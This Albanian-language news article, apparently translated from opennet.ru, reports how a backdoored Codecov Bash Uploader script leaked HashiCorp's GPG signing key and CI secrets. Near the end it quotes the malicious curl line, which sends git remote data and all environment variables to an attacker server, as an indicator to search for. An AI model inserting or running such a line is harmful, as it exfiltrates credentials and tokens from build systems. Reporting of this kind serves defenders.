Injeksion i kodit keqdashës në skriptin Codecov çoi në kompromitimin e çelësit PGP të HashiCorp.

Kompania HashiCorp, e njohur për zhvillimin e mjeteve hapur si Vagrant, Packer, Nomad dhe Terraform, njoftoi për rrjedhjen e çelësit të sajuar GPG, i cili përdoret për krijimin e nënshkrimeve digjitale që verifikojnë publikimet. Sulmuesit, që fituan akses në çelësin GPG, potencialisht mund të kishin bërë ndryshime të fshehta në produktet HashiCorp, duke i fuqizuar ato me një nënshkrim digjital të saktë. Megjithatë, kompania deklaroi se gjatë auditeve të kryera nuk janë zbuluar prova të përpjekjeve për të bërë ndryshime të tilla.

Aktualisht çelësi GPG i komprometuar është tërhequr dhe është prezantuar një çelës i ri. Problemi ka prekur vetëm verifikimin përmes skedave SHA256SUM dhe SHA256SUM.sig, dhe nuk ka ndikuar në formimin e nënshkrimeve digjitale për paketat Linux DEB dhe RPM, të cilat ofrohen përmes releases.hashicorp.com, si dhe mekanizmat e konfirmimit për publikimet për macOS dhe Windows (AuthentiCode).

Rrjedhja ndodhi për shkak të përdorimit në infrastrukturë të skriptit Codecov Bash Uploader (codecov-bash), i destinuar për ngarkimin e raporteve të mbulimit nga sistemet e integrimit të vazhdueshëm. Gjatë sulmit ndaj kompanisë Codecov, në këtë skript u fut një backdoor e fshehur, përmes së cilës u organizua dërgimi i fjalëkalimeve dhe çelësave të enkriptimit në server të sulmuesve.

Për të kryer hackimin, sulmuesit shfrytëzuan një gabim në procesin e krijimit të imazhit Docker për Codecov, i cili lejonte nxjerrjen e të dhënave për aksesin në GCS (Google Cloud Storage), të nevojshme për të bërë ndryshime në skriptin Bash Uploader, i cili shpërndahej nga faqja codecov.io. Ndryshimet u bënë më 31 janar, dhe për dy muaj mbetën të padukshme, duke lejuar kriminelët të nxjerrin informacion të ruajtur në ambientet e sistemeve të integrimit të vazhdueshëm të klientëve. Me anë të kodit të dëmshëm të shtuar, kriminelët mund të merrnin informacion rreth repository-t Git që testoheshin dhe të gjitha variablat e ambientit, duke përfshirë atyre që përmbanin tokene, çelësa të enkriptimit dhe fjalëkalime, të dërguara në sistemet e integrimit të vazhdueshëm për të organizuar aksesin në kodin e aplikacioneve, depo dhe shërbime si Amazon Web Services dhe GitHub.

Përveç thirrjes së drejtpërdrejtë, skripti Codecov Bash Uploader është përdorur si pjesë e ngarkuesve të tjerë, të tillë si Codecov-action (Github), Codecov-circleci-orb dhe Codecov-bitrise-step, përdoruesit e të cilëve gjithashtu janë të prekur nga problemi. Të gjithë përdoruesit e codecov-bash dhe produkteve që lidhen me të, rekomandohet të kryejnë një auditim të infrastrukturës së tyre, si dhe të ndryshojnë fjalëkalimet dhe çelësat e kriptimit. Për të kontrolluar praninë e një backdoor në skript, mund të kontrolloni për praninë në të të rreshtit curl -sm 0.5 -d "$(git remote -v)<<<< ENV $(env)" http:///upload/v2 || true

Burimi: opennet.ru

Blini hosting tĂ« besueshĂ«m pĂ«r faqe interneti me mbrojtje nga DDoS, serverĂ« VPS VDS đŸ”„ Blini hosting tĂ« besueshĂ«m pĂ«r faqe interneti me mbrojtje nga DDoS, serverĂ« VPS VDS | ProHoster